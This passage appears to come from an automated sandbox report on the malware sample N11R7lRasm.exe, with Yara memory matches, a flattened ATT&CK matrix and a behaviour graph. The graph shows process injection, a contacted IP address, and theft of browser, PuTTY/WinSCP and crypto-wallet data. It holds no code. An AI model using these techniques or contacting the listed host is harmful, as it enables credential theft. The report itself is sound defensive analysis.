                  Source: Yara matchFile source: 00000000.00000002.1855724656.000000000A9E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1934326719.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: N11R7lRasm.exe PID: 4424, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6552, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  Command and Scripting Interpreter                  		1
                  Create Account                  		1
                  Extra Window Memory Injection                  		1
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		1
                  Account Discovery                  		Remote Desktop Protocol4
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  Registry Run Keys / Startup Folder                  		411
                  Process Injection                  		1
                  DLL Side-Loading                  		Security Account Manager4
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		1
                  Remote Access Software                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  Registry Run Keys / Startup Folder                  		1
                  Extra Window Memory Injection                  		NTDS35
                  System Information Discovery                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                  Masquerading                  		LSA Secrets1
                  Query Registry                  		SSHKeylogging14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials11
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items411
                  Process Injection                  		DCSync1
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1614222 Sample: N11R7lRasm.exe Startdate: 13/02/2025 Architecture: WINDOWS Score: 100 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 5 other signatures 2->71 8 N11R7lRasm.exe 2->8         started        11 msedge.exe 622 2->11         started        process3 signatures4 73 Writes to foreign memory regions 8->73 75 Allocates memory in foreign processes 8->75 77 Injects a PE file into a foreign processes 8->77 13 BitLockerToGo.exe 50 8->13         started        18 msedge.exe 11->18         started        20 msedge.exe 11->20         started        22 msedge.exe 11->22         started        24 msedge.exe 11->24         started        process5 dnsIp6 51 77.239.117.222, 443, 49713, 49714 DATAHOPDatahop-SixDegreesGB United Kingdom 13->51 53 127.0.0.1 unknown unknown 13->53 43 C:\ProgramData\t0r90\f379r9, PE32+ 13->43 dropped 81 Attempt to bypass Chrome Application-Bound Encryption 13->81 83 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->83 85 Found many strings related to Crypto-Wallets (likely being stolen) 13->85 87 5 other signatures 13->87 26 msedge.exe 2 11 13->26         started        29 chrome.exe 8 13->29         started        32 cmd.exe 13->32         started        55 c-msn-pme.trafficmanager.net 13.74.129.1, 443, 49765 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->55 57 20.110.205.119, 443, 49819, 49843 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->57 59 30 other IPs or domains 18->59 file7 signatures8 process9 dnsIp10 79 Monitors registry run keys for changes 26->79 34 msedge.exe 26->34         started        61 192.168.2.8, 138, 443, 49705 unknown unknown 29->61 63 239.255.255.250 unknown Reserved 29->63 36 chrome.exe 29->36         started        39 conhost.exe 32->39         started        41 timeout.exe 32->41         started        signatures11 process12 dnsIp13 45 www.google.com 142.250.185.228, 443, 49723, 49726 GOOGLEUS United States 36->45 47 plus.l.google.com 36->47 49 2 other IPs or domains 36->49

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.